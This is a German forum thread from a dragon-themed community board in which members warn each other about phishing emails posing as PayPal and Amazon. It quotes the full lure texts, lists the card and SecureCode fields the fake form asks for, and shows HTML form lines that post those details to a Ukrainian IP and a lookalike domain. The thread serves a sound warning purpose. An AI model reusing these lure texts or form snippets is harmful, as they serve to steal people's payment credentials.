--- NEWS: 10.05.2012 : Benachrichtigungen über beobachtete Boards | --- EVENTS: 02.06.2012 - Zock 2012 - playTogether | 02.06.2012 - Furry-Stammtisch | 21.07.2012 - Grillfeier | --- GEBURTSTAGE HEUTE: Cupropituvanso Draco (28) | Teaka (22) | --- GEBURTSTAGE DEMNÄCHST: Khazu (19) | vandragon (35) | BrooK (35) | Dafty (22) | schwarz (21) | Schwarzesherz (21) |
TheDragonworld Drachenburg Board
23.Mai.2012, 09:31:11 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
 
   Übersicht   Hilfe Suche JAVA CHATZUGANG Mitglieder Einloggen Registrieren  
Seiten: [1]   Nach unten
  Drucken  
Autor Thema: Phishing Warnungen  (Gelesen 793 mal)
Ariguseli
Bewohner
*****
Offline Offline

Beiträge: 1.194


Schwarzdrachen-Fan-Club


Profil anzeigen
« am: 21.November.2011, 15:51:20 »

Ich habe unverhofft eine Email vom Paypal Support <Support@Paypal.de >erhalten, in der ich aufgefordert wurde, meine Kreditkarte erneut zu registrieren. Da ich keine Kreditkarte besitze und solche Email ohnehin als verdächtig ansehe, habe ich bei PayPal angerufen.
Die Aussage der PayPal-Kundenservice-Mitarbeiterin war eindeutig. „Bei uns sind keinerlei Kreditkartendaten notwendig, Diese E-Mail und diese E-Mail-Adresse stammen NICHT von uns, trage sie keine Daten ein und löschen diese Mail“.

Inhalt der Mail:
Zitat
Paypal - Bitte registrieren Sie Ihre Kreditkarte.

Sehr geehrter Kunde,

aufgrund eines automatisierten Abgleiches Ihrer Kundendaten mit Vergleichsstatistiken wurde das Risiko eines Zahlungsausfalls für Ihr Konto als überdurchschnittlich hoch eingestuft. Um weiterhin problemlos die Zahlungsmethode Bankeinzug nutzen zu können, bitten wir Sie eine Kreditkarte - als Sicherheit bei Zahlungsausfällen - bei uns zu registrieren. Diese wird Ihrem Account nicht als Zahlungsmethode hinzugefügt, sondern dient lediglich als Absicherung bei einem nicht ausreichend gedeckten Bankkonto. Sollten sie keine Kreditkarte bei uns hinterlegen, wird die Zahlungsmethode Bankeinzug für Ihr Konto deaktiviert. Ihre Kreditkartendaten können Sie mithilfe des beigefügten Formulars hinterlegen. Es ist dabei irrelevant ob Sie bereits eine Kreditkarte bei uns registriert haben, aus vertragsrechtlichen Gründen dürfen wir diese Kartendaten nicht als zusätzliche Sicherheit heranziehen. Sie können also eine Karte, welche bereits bei uns registriert ist, auch als Sicherheit hinterlegen. Wir bitten die Unannehmlichkeiten zu Entschuldigen, dieses Vorgehen ist allerdings aufgrund vermehrter Betrugsversuche durch ungedeckte Bankkonten erforderlich.
   
Hilfe-Center | Sicherheits-Center

Bitte antworten Sie nicht auf diese E-Mail. E-Mails an diese Adresse werden von uns nicht gelesen. Um mit einem Mitarbeiter unseres Kundenservice zu sprechen,loggen Sie sich in Ihr PayPal-Konto ein und klicken Sie unten auf "Kontakt".

Copyright © 2011 PayPal. Alle Rechte vorbehalten.

PayPal (Europe) S.à r.l.et Cie, S.C.A.
Société en Commandite par Actions
Sitz: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349


PayPal-E-Mail-ID PP1488

Im Anhang befindet sich die Datei „Registrierung.html“, in der folgende Daten eingetragen werden sollten.
Zitat
Personenbezogene Daten:
-Vorname
-Nachname
-Straße und Hausnummer
-PLZ
-Ort
-Land

Kreditkarte:
-Abrechnungskontonummer
-Kreditkartennummer
-Kartenprüfnummer
(Die letzten drei Stellen auf der Rückseite Ihrer Karte. Bei American Express eine vierstellige Nummer auf der Vorderseite Ihrer Karte)
-Ablaufdatum
Um Ihnen in Zukunft noch mehr Sicherheit und Flexibilität beim Online Einkauf zu gewähren, bitten wir Sie, Ihr MasterCard® SecureCode© / Verified by Visa Passwort einzugeben.





JaNe is klar … Meinem letzten Kenntnisstand nach, sollte man dieses Passwort nie irgendwo eingeben. Sobald jemand das „MasterCard® SecureCode© / Verified by Visa Passwort“ kann das Konto vom Betrüger in Ruhe geplündert werden.

Denn …

Die eingeben Daten werden in der HTML-CodeZeile
Code:
<form class="safeSubmit multiplesubmitform" method="post" id="signup_form" name="signup_form" action="http://91.223.89.200/… (den 30igstelligen Hashcode habe ich entfernt) … /frage.php ">
nicht zu Paypal geschickt, sondern zu einem Ukrainischem PHP-Skript, was sicher die Daten in einer hübschen Datenbank einlagern möchte.
Zitat
91.223.89.200 - Geo Information
IP Address 91.223.89.200
Host 91.223.89.200
Location  UA, Ukraine
City -, - -
Organization ENERGOMONTAZH ltd.
ISP ENERGOMONTAZH ltd.
AS Number AS197572 ASNCITYNET CITYNET MARCIN SOBALA - PIOTR MISIUDA
Latitude 49°00'00" North
Longitude 32°00'00" East
Distance 971.25 km (603.51 miles)
« Letzte Änderung: 03.Dezember.2011, 16:25:17 von Cupropituvanso Draco » Gespeichert

...Streite niemals mit einem Idioten - zuerst zieht er Dich auf sein Niveau herab und dann schlägt er Dich mit seiner Erfahrung!!!...


Wir die guten Willens sind,
geführt von Ahnungslosen,
versuchen, für die Undankbaren,
das Unmögliche zu vollbringen,

Wir haben so viel, mit so wenig,
solange versucht,
das wir jetzt qualifiziert sind,
alles mit nichts zu bewerkstelligen


Cupropituvanso Draco
Chef
**********
Offline Offline

Geschlecht: Männlich
Wesen & Alter: Drache, ca. 2500
Beiträge: 8.174



Profil anzeigen WWW
« Antworten #1 am: 21.November.2011, 19:28:34 »

Ist sicher für manche unwissenden User ganz gesund zu wissen ... ich frag mich nur ob wir nicht gleich nen "Phishing-Warnungs-Thread" draus machen (wobei ich glaub da könn ma mit anderen Threads zusammenfassen), denn es kommt ja jeden Tag sehr viel auch von berühmten Seiten.
Ich hab für TheDragonworld.com einen eigenen SpamAccount, wo quasi nix gelöscht wird, sondern dort landet alles von allen Mailadressen. Da kommt viel zusammen ^^
Gespeichert

Cupro & Angelus - 4Wings4Ever

Früher war hier eine Liste einiger enger Freunde, doch möchte ich keine Liste führen.
Ich möchte viel lieber meinen Freunden danken, dass sie für mich da sind und ihnen versprechen für sie da zu sein!


Ich verfolge mit der Dragonworld grundsätzliche Ideen und Visionen mit dem Ziel einen Platz für "menschlich-tierische Wesen" zu schaffen, wobei die Zielgruppe Drachen sind, aber alle Wesen willkommen sind.

meine Bewohner-Informationen

Avatar by Neomae
Dreikun
Team Dragonworld
******
Offline Offline

Geschlecht: Männlich
Wesen & Alter: Drache... Menschliches alter 26 Drachen alter 5
Beiträge: 1.615


Ich vor gut 500 Jahren


Profil anzeigen WWW
« Antworten #2 am: 21.November.2011, 20:10:31 »

Würde ich gut finden. Es gibt ja schon nen Vieren Tread, also warum dann nicht auch einen für solche Mails?...
Gespeichert

Ja Drachen gibt es, nur können die meisten Menschen sie nicht sehen!
Ariguseli
Bewohner
*****
Offline Offline

Beiträge: 1.194


Schwarzdrachen-Fan-Club


Profil anzeigen
« Antworten #3 am: 02.Dezember.2011, 00:41:19 »

^,.‘.,^  tihi eine neue Phishing-Mail, 9 Tage später, gleiches Anliegen, gleicher Inhalt mal abgesehen das sie kürzer ist als die vorherige, Neuer Email-Absender diesmal „info@paypal-deutschland.de“ ... scheinen wohl dazulernen zu wollen.
ich bin aber auch nicht doof  Cool ... mal abgesehen davon das ich die aus Neugier öffnete. Bevor ich mir eine Kreditkarte zulege die ich das eintragen kann, würde ich eher auf Paypal im ganzen verzichten.

Was ist anders:
Code:
<form class="safeSubmit multiplesubmitform" method="post" id="signup_form" name="signup_form" action="http://sicherheit-service.net/654321/index.php">

Das Ziel sollte wohl diesmal besser verschleiert werden. Wenn man nur zur Hauptdomaine surft Kommt man bei einer DHL-Verifizierungs-Seite raus o,.‘.,O
Zitat
Sie sind bereits PACKSTATION Kunde und wurden per E-Mail aufgefordert Ihre PACKSTATION zu verifizieren?
… folge man dem kompletten Pfad, so wird man zu PayPal umgeleitet.

Die DNS-Auflösung ergab folgendes:
Zitat
SICHERHEIT-SERVICE.NET - Domain Information
Domain    SICHERHEIT-SERVICE.NET
Registrar    INTERNETWIRE COMMUNICATIONS GMBH
Registrar URL    http://www.internetwire.de
Whois server    whois.internetwire.de
Created    28-Nov-2011
Updated    28-Nov-2011
Expires    28-Nov-2012
Time Left    362 days 1 hours 1 minutes
Status    clientTransferProhibited
DNS servers    NS5.KASSERVER.COM   85.13.128.3
NS6.KASSERVER.COM   85.13.159.101

SICHERHEIT-SERVICE.NET - Geo Information
IP Address    91.223.89.200 
Host    sicherheit-service.net
Location    UA UA, Ukraine
City    -, - -
Organization    ENERGOMONTAZH ltd.
ISP    ENERGOMONTAZH ltd.
AS Number    AS197572 ASNCITYNET CITYNET MARCIN SOBALA - PIOTR MISIUDA
Latitude    49°00'00" North
Longitude    32°00'00" East
Distance    971.25 km (603.51 miles)

Welch Zufall, die aufgelöste IP des Zielservers ist die gleiche wie zuvor. Ich bin am Überlegen ob man dies nicht irgendwie polizeilich anzeigen kann. Ich habe die Vermutung das hier weit mehr dahinter steckt als nur ein Phishing bei PayPal Kunden.




@ Draco .. ja ich befürworte ein Zusammenlegen von Gefahrenthemen
 
Gespeichert

...Streite niemals mit einem Idioten - zuerst zieht er Dich auf sein Niveau herab und dann schlägt er Dich mit seiner Erfahrung!!!...


Wir die guten Willens sind,
geführt von Ahnungslosen,
versuchen, für die Undankbaren,
das Unmögliche zu vollbringen,

Wir haben so viel, mit so wenig,
solange versucht,
das wir jetzt qualifiziert sind,
alles mit nichts zu bewerkstelligen


Xantarax
Bewohner
*****
Offline Offline

Geschlecht: Männlich
Wesen & Alter: Feuerdrache und nicht der rede wert!
Beiträge: 94



Profil anzeigen WWW
« Antworten #4 am: 03.Dezember.2011, 13:14:27 »

Ach wie interessant und ohne Rechtschreibfehler, da hat sich einer mühe gegeben.

Ich habe vor ca. 2 Monaten von Amazon insgesamt 3 Mails erhalten, in diesen stand das mein Konto versucht wurde zu hacken und das ich mich über den mitgesendeten Link neu verifizieren muss. Auf dem ersten Blick konnte man diese Mail tatsächlich als Voll nehmen, aber beim anklicken des Links schlug die Secruity Software Alarm "Betrügerische Website". Bei Amazon ist das bekannt und es gibt dazu eine grosse Infoseite zu den Phishing-Mails. Natürlich fragt Amazon niemals Kundendaten über E-Mail ab.

Also ab in die Mülltonne und endgültig gelöscht. Hätt ich mal aufheben sollen, währe sicher mal interessant wo der Server steht ^^
Gespeichert

Unterm Strich - zähl ich!

1, 2, 3... XDDD
Cupropituvanso Draco
Chef
**********
Offline Offline

Geschlecht: Männlich
Wesen & Alter: Drache, ca. 2500
Beiträge: 8.174



Profil anzeigen WWW
« Antworten #5 am: 03.Dezember.2011, 16:33:22 »

Keine Sorge Xantarax, habe ich auch bekommen.
Ariguseli, hab den Thread umbenannt.

Absender Amazon:

Zitat
Wichtige Mitteilung

Sehr geehrter Kunde Amazon

Wir möchten Ihnen mitteilen, dass Ihr Amazon Konto von einem nicht autorisierten Computer zugegriffen wurde.

Bitte besuchen Sie und bestätigen, dass Sie der Inhaber des Kontos sind.   

http://www.amazon.az
Gespeichert

Cupro & Angelus - 4Wings4Ever

Früher war hier eine Liste einiger enger Freunde, doch möchte ich keine Liste führen.
Ich möchte viel lieber meinen Freunden danken, dass sie für mich da sind und ihnen versprechen für sie da zu sein!


Ich verfolge mit der Dragonworld grundsätzliche Ideen und Visionen mit dem Ziel einen Platz für "menschlich-tierische Wesen" zu schaffen, wobei die Zielgruppe Drachen sind, aber alle Wesen willkommen sind.

meine Bewohner-Informationen

Avatar by Neomae
Cupropituvanso Draco
Chef
**********
Offline Offline

Geschlecht: Männlich
Wesen & Alter: Drache, ca. 2500
Beiträge: 8.174



Profil anzeigen WWW
« Antworten #6 am: 05.Dezember.2011, 21:17:51 »

Absender PayPal:

Zitat
PayPal
Überprüfen des Kontoinhabers
Bearbeitungsnummer: PP-001-512-946-356.

Ihr Sicherheitsschlüssel konnte nicht aktiviert werden.

Zu Ihrem Schutz haben wir den Zugriff auf Ihr Konto eingeschränkt.
Zum Zugriff auf Ihr Konto können und Ihre Identität verifizieren
Klick Sie den unten gennanten Link :

Überprüfen Sie Ihre Kontodaten jetzt

Wir haben aus folgendem Grund Informationen von Ihnen erbeten.
Gemäß den Nutzungsbedingungen von PayPal bleibt der Zugriff auf
Ihr Konto eingeschränkt, bis dieses Problem gelöst wurde.

Wenn der Zugriff auf Ihr Konto für längere Zeit eingeschränkt bleibt,
kann dies leider zu zusätzlichen
Einschränkungen oder sogar zur Schließung des Kontos führen.

Wir empfehlen Ihnen, sich so bald wie möglich in Ihr PayPal-Konto
einzuloggen, um dies zu vermeiden.
Wir bedanken uns för die rasche Erledigung dieser Angelegenheit.

Haben Sie bitte Verständnis, dass dies eine Sicherheitsmaßnahme ist,
die Sie und Ihr Konto schÜtzen soll.

Wir bedauern eventuelle Unannehmlichkeiten.
Herzliche Grüße PayPal-Kontoprüfungsabteilung

Bitte nicht auf diese E-Mail, weil wir nicht die Überwachung sind diese Posteingang. Um mit uns in Verbindung, in Ihrem Konto anmelden und klicken Sie auf "Kontakt" am unteren Rand jeder Seite.
ABN 93 111 195 389 (AFSL 304962)

Copyright © 2011 PayPal. All rights reserved.

PayPal Germany Pty Limited r.l.et Cie, S.C.A.
Société en Commandite par Actions
Registered office: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349

PayPal Email ID PP1478
Gespeichert

Cupro & Angelus - 4Wings4Ever

Früher war hier eine Liste einiger enger Freunde, doch möchte ich keine Liste führen.
Ich möchte viel lieber meinen Freunden danken, dass sie für mich da sind und ihnen versprechen für sie da zu sein!


Ich verfolge mit der Dragonworld grundsätzliche Ideen und Visionen mit dem Ziel einen Platz für "menschlich-tierische Wesen" zu schaffen, wobei die Zielgruppe Drachen sind, aber alle Wesen willkommen sind.

meine Bewohner-Informationen

Avatar by Neomae
angelus
Dragonworld Moderator
*******
Offline Offline

Wesen & Alter: Halbblut  seeeeeeehr alt
Beiträge: 528


Avatar by Neomae


Profil anzeigen
« Antworten #7 am: 07.Dezember.2011, 20:32:39 »

Neue Warnung aus Österreich:


* 390129_309871889033317_100000315245220_1086889_547943763_n.jpg (78.89 KB, 960x720 - angeschaut 34 Mal.)
Gespeichert

4Wings
Angelus...die die dem Drachen befiehlt. Smiley

Die Menschen beurteilen alle Dinge nach dem Erfolg. Jeder sieht, was du scheinst, und nur wenige fühlen, was du bist.

angelus
Dragonworld Moderator
*******
Offline Offline

Wesen & Alter: Halbblut  seeeeeeehr alt
Beiträge: 528


Avatar by Neomae


Profil anzeigen
« Antworten #8 am: 16.Dezember.2011, 19:29:57 »

Phishingwarnung aus Österreich hinfällig...Nummer wurde gesperrt  Smiley
Gespeichert

4Wings
Angelus...die die dem Drachen befiehlt. Smiley

Die Menschen beurteilen alle Dinge nach dem Erfolg. Jeder sieht, was du scheinst, und nur wenige fühlen, was du bist.

Seiten: [1]   Nach oben
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2006, Simple Machines Prüfe XHTML 1.0 Prüfe CSS